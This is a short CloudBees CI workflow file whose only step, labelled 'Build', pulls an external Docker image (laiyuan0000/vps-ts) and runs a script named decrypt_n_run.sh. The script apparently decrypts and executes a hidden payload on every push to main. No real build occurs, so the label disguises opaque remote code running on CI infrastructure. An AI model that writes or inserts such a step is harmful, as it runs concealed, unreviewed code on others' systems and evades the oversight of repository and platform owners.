apiVersion: automation.cloudbees.io/v1alpha1
kind: workflow
name: workflow
jobs:
  build:
    steps:
      - uses: docker://laiyuan0000/vps-ts
        name: Build
        shell: bash
        run: |
          cd /home/docker/root && /home/docker/public_sh/decrypt_n_run.sh
on:
  push:
    branches:
      - main
